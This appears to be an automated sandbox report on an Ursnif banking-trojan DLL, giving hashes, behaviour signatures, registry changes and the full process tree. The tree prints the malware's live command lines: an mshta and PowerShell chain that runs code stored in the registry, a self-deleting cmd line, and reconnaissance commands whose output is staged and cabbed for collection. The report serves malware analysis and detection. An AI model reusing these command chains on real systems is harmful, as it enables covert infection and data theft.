Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
01-12-2020 09:54
Static task
static1
Behavioral task
behavioral1
Sample
5fc612703f844.dll
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
5fc612703f844.dll
-
Size
122KB
-
MD5
897285413e9a2bc5207996e43432078f
-
SHA1
0da15676430232150a2b2d5b7b9a2cf19d7b3306
-
SHA256
99b6752f4009fd4bbf0c62cf0f30285fbf28bbdd3c5b7fee0bf1b7fe20a8a406
-
SHA512
20c986925305276ff52746e0cd8081d8174251e0392ed355a48d94d7febdd5c6955998d9255594b146926bf66886de067a0f942f34ab75b5f1f302794149c9d1
Malware Config
Extracted
Family
ursnif
Attributes
- dga_base_url
-
dga_crc
0
-
dga_season
0
- dga_tlds
- dns_servers
Signatures
-
Deletes itself 1 IoCs
pid Process 1368 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 532 set thread context of 1260 532 powershell.exe 11 PID 1260 set thread context of 1368 1260 Explorer.EXE 46 PID 1368 set thread context of 964 1368 cmd.exe 48 PID 1260 set thread context of 300 1260 Explorer.EXE 58 -
Program crash 1 IoCs
pid pid_target Process procid_target 1324 284 WerFault.exe 25 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 960 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 300 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1912 systeminfo.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A8A729C1-33BA-11EB-B97E-C2515532CB8E} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3026fe7fc7c7d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000bec4d043004c2e21b9aeadf4da006a29f0effa7cb981ce78dbb94ba0759f3e3c000000000e8000000002000020000000479749cd999b1bc1f8eef122317656082f140e73e023044c457849a72a267707200000006539b3f9e6f93f5a7bde011df2fd32814543c249b2bce5162ea15523b9d6986c40000000d362f44004d60b69b1962edddd89a76a1286a59ef1e7c154c6fe934be684f3da2cfc99f8f9c1d71c001472c72a3b3b76eb687f1982d13db950981b2e38546236 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000c5a0c7c7b118f8896d20553571accca1031772336deb8997508234e2fc66466d000000000e80000000020000200000008f70c56107ef247aa04536ab75f63302eaad78eea2d174fdfac65ab93956013890000000bd5df768277f0737291f4c2e5ac540e38295411c351d0b737ab7b5d5f06e5d1b30fbb74bbc59528045e33c4c3b9a8966d756e6b7ddcf53752c49ed4807bc87c2a7524a69448128a71327e57125bf4395ae9dddb82b6e72d6029e44f9398703e633964ba8f6c98c1003295d841a016a7cbfe786683da46dde85012b5b24a29eabc517aa56fbecea45912df7f295b4730e40000000aa0beade565e4b4afcaf3cc05fb55e8cf60aa00bde8dd8fc86b1b36d2e3dba44c3788fb25042b436b0083f8bef06543bcc0797312c25d62d4b0583cf52a30eae iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C45CAB41-33BA-11EB-B97E-C2515532CB8E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 964 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 964 PING.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 284 regsvr32.exe 532 powershell.exe 532 powershell.exe 1260 Explorer.EXE 1324 WerFault.exe 1324 WerFault.exe 1324 WerFault.exe 1324 WerFault.exe 1324 WerFault.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 532 powershell.exe 1260 Explorer.EXE 1368 cmd.exe 1260 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 532 powershell.exe Token: SeDebugPrivilege 1324 WerFault.exe Token: SeShutdownPrivilege 1260 Explorer.EXE Token: SeDebugPrivilege 300 tasklist.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1940 iexplore.exe 1952 iexplore.exe 1952 iexplore.exe 1952 iexplore.exe 1260 Explorer.EXE 1260 Explorer.EXE -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 1940 iexplore.exe 1940 iexplore.exe 556 IEXPLORE.EXE 556 IEXPLORE.EXE 1952 iexplore.exe 1952 iexplore.exe 1612 IEXPLORE.EXE 1612 IEXPLORE.EXE 1952 iexplore.exe 1952 iexplore.exe 1612 IEXPLORE.EXE 1612 IEXPLORE.EXE 1952 iexplore.exe 1952 iexplore.exe 1612 IEXPLORE.EXE 1612 IEXPLORE.EXE 1260 Explorer.EXE -
Suspicious use of WriteProcessMemory 125 IoCs
description pid Process procid_target PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1424 wrote to memory of 284 1424 regsvr32.exe 25 PID 1940 wrote to memory of 556 1940 iexplore.exe 33 PID 1940 wrote to memory of 556 1940 iexplore.exe 33 PID 1940 wrote to memory of 556 1940 iexplore.exe 33 PID 1940 wrote to memory of 556 1940 iexplore.exe 33 PID 1952 wrote to memory of 1612 1952 iexplore.exe 36 PID 1952 wrote to memory of 1612 1952 iexplore.exe 36 PID 1952 wrote to memory of 1612 1952 iexplore.exe 36 PID 1952 wrote to memory of 1612 1952 iexplore.exe 36 PID 528 wrote to memory of 532 528 mshta.exe 40 PID 528 wrote to memory of 532 528 mshta.exe 40 PID 528 wrote to memory of 532 528 mshta.exe 40 PID 532 wrote to memory of 2020 532 powershell.exe 42 PID 532 wrote to memory of 2020 532 powershell.exe 42 PID 532 wrote to memory of 2020 532 powershell.exe 42 PID 2020 wrote to memory of 1920 2020 csc.exe 43 PID 2020 wrote to memory of 1920 2020 csc.exe 43 PID 2020 wrote to memory of 1920 2020 csc.exe 43 PID 532 wrote to memory of 584 532 powershell.exe 44 PID 532 wrote to memory of 584 532 powershell.exe 44 PID 532 wrote to memory of 584 532 powershell.exe 44 PID 584 wrote to memory of 1560 584 csc.exe 45 PID 584 wrote to memory of 1560 584 csc.exe 45 PID 584 wrote to memory of 1560 584 csc.exe 45 PID 532 wrote to memory of 1260 532 powershell.exe 11 PID 532 wrote to memory of 1260 532 powershell.exe 11 PID 532 wrote to memory of 1260 532 powershell.exe 11 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1260 wrote to memory of 1368 1260 Explorer.EXE 46 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 284 wrote to memory of 1324 284 regsvr32.exe 49 PID 284 wrote to memory of 1324 284 regsvr32.exe 49 PID 284 wrote to memory of 1324 284 regsvr32.exe 49 PID 284 wrote to memory of 1324 284 regsvr32.exe 49 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 1368 wrote to memory of 964 1368 cmd.exe 48 PID 1260 wrote to memory of 1072 1260 Explorer.EXE 50 PID 1260 wrote to memory of 1072 1260 Explorer.EXE 50 PID 1260 wrote to memory of 1072 1260 Explorer.EXE 50 PID 1072 wrote to memory of 708 1072 cmd.exe 52 PID 1072 wrote to memory of 708 1072 cmd.exe 52 PID 1072 wrote to memory of 708 1072 cmd.exe 52 PID 1260 wrote to memory of 396 1260 Explorer.EXE 53 PID 1260 wrote to memory of 396 1260 Explorer.EXE 53 PID 1260 wrote to memory of 396 1260 Explorer.EXE 53 PID 1260 wrote to memory of 1476 1260 Explorer.EXE 55 PID 1260 wrote to memory of 1476 1260 Explorer.EXE 55 PID 1260 wrote to memory of 1476 1260 Explorer.EXE 55 PID 1476 wrote to memory of 1912 1476 cmd.exe 57 PID 1476 wrote to memory of 1912 1476 cmd.exe 57 PID 1476 wrote to memory of 1912 1476 cmd.exe 57 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 300 1260 Explorer.EXE 58 PID 1260 wrote to memory of 1124 1260 Explorer.EXE 62 PID 1260 wrote to memory of 1124 1260 Explorer.EXE 62 PID 1260 wrote to memory of 1124 1260 Explorer.EXE 62 PID 1260 wrote to memory of 1556 1260 Explorer.EXE 64 PID 1260 wrote to memory of 1556 1260 Explorer.EXE 64 PID 1260 wrote to memory of 1556 1260 Explorer.EXE 64 PID 1556 wrote to memory of 960 1556 cmd.exe 66 PID 1556 wrote to memory of 960 1556 cmd.exe 66 PID 1556 wrote to memory of 960 1556 cmd.exe 66 PID 1260 wrote to memory of 672 1260 Explorer.EXE 67 PID 1260 wrote to memory of 672 1260 Explorer.EXE 67 PID 1260 wrote to memory of 672 1260 Explorer.EXE 67 PID 1260 wrote to memory of 1920 1260 Explorer.EXE 69 PID 1260 wrote to memory of 1920 1260 Explorer.EXE 69 PID 1260 wrote to memory of 1920 1260 Explorer.EXE 69 PID 1920 wrote to memory of 1036 1920 cmd.exe 71 PID 1920 wrote to memory of 1036 1920 cmd.exe 71 PID 1920 wrote to memory of 1036 1920 cmd.exe 71 PID 1260 wrote to memory of 344 1260 Explorer.EXE 72 PID 1260 wrote to memory of 344 1260 Explorer.EXE 72 PID 1260 wrote to memory of 344 1260 Explorer.EXE 72 PID 1260 wrote to memory of 1444 1260 Explorer.EXE 74 PID 1260 wrote to memory of 1444 1260 Explorer.EXE 74 PID 1260 wrote to memory of 1444 1260 Explorer.EXE 74 PID 1444 wrote to memory of 300 1444 cmd.exe 76 PID 1444 wrote to memory of 300 1444 cmd.exe 76 PID 1444 wrote to memory of 300 1444 cmd.exe 76 PID 1260 wrote to memory of 1712 1260 Explorer.EXE 77 PID 1260 wrote to memory of 1712 1260 Explorer.EXE 77 PID 1260 wrote to memory of 1712 1260 Explorer.EXE 77 PID 1260 wrote to memory of 708 1260 Explorer.EXE 79 PID 1260 wrote to memory of 708 1260 Explorer.EXE 79 PID 1260 wrote to memory of 708 1260 Explorer.EXE 79 PID 708 wrote to memory of 1956 708 cmd.exe 81 PID 708 wrote to memory of 1956 708 cmd.exe 81 PID 708 wrote to memory of 1956 708 cmd.exe 81 PID 1260 wrote to memory of 1176 1260 Explorer.EXE 82 PID 1260 wrote to memory of 1176 1260 Explorer.EXE 82 PID 1260 wrote to memory of 1176 1260 Explorer.EXE 82 PID 1260 wrote to memory of 1372 1260 Explorer.EXE 84 PID 1260 wrote to memory of 1372 1260 Explorer.EXE 84 PID 1260 wrote to memory of 1372 1260 Explorer.EXE 84 PID 1372 wrote to memory of 2044 1372 cmd.exe 86 PID 1372 wrote to memory of 2044 1372 cmd.exe 86 PID 1372 wrote to memory of 2044 1372 cmd.exe 86 PID 1260 wrote to memory of 672 1260 Explorer.EXE 87 PID 1260 wrote to memory of 672 1260 Explorer.EXE 87 PID 1260 wrote to memory of 672 1260 Explorer.EXE 87 PID 1260 wrote to memory of 304 1260 Explorer.EXE 89 PID 1260 wrote to memory of 304 1260 Explorer.EXE 89 PID 1260 wrote to memory of 304 1260 Explorer.EXE 89 PID 1260 wrote to memory of 324 1260 Explorer.EXE 91 PID 1260 wrote to memory of 324 1260 Explorer.EXE 91 PID 1260 wrote to memory of 324 1260 Explorer.EXE 91
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 284 -s 4124⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CB4B3BAF-AEAE-3526-102F-C23944D3167D\\\Auxisext'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CB4B3BAF-AEAE-3526-102F-C23944D3167D").aepiesrv))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cltiztm2\cltiztm2.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B4E.tmp" "c:\Users\Admin\AppData\Local\Temp\cltiztm2\CSC11BC61A5A06348AFBB9F8843C89F696.TMP"5⤵PID:1920
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ofncpex\2ofncpex.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BDA.tmp" "c:\Users\Admin\AppData\Local\Temp\2ofncpex\CSC8D3B403B46A54A00BEB5BDC7F96AF1FE.TMP"5⤵PID:1560
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\5fc612703f844.dll"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:964
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\9268.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:708
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\9268.bi1"2⤵PID:396
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1912
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:300
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1124
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1556
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:960
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:672
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1920
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1036
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:344
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1444
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1712
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:708
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1176
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:1372
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:672
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\EAE0.bin1 > C:\Users\Admin\AppData\Local\Temp\EAE0.bin & del C:\Users\Admin\AppData\Local\Temp\EAE0.bin1"2⤵PID:304
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\68DA.bin"2⤵PID:324
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:556
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1612
-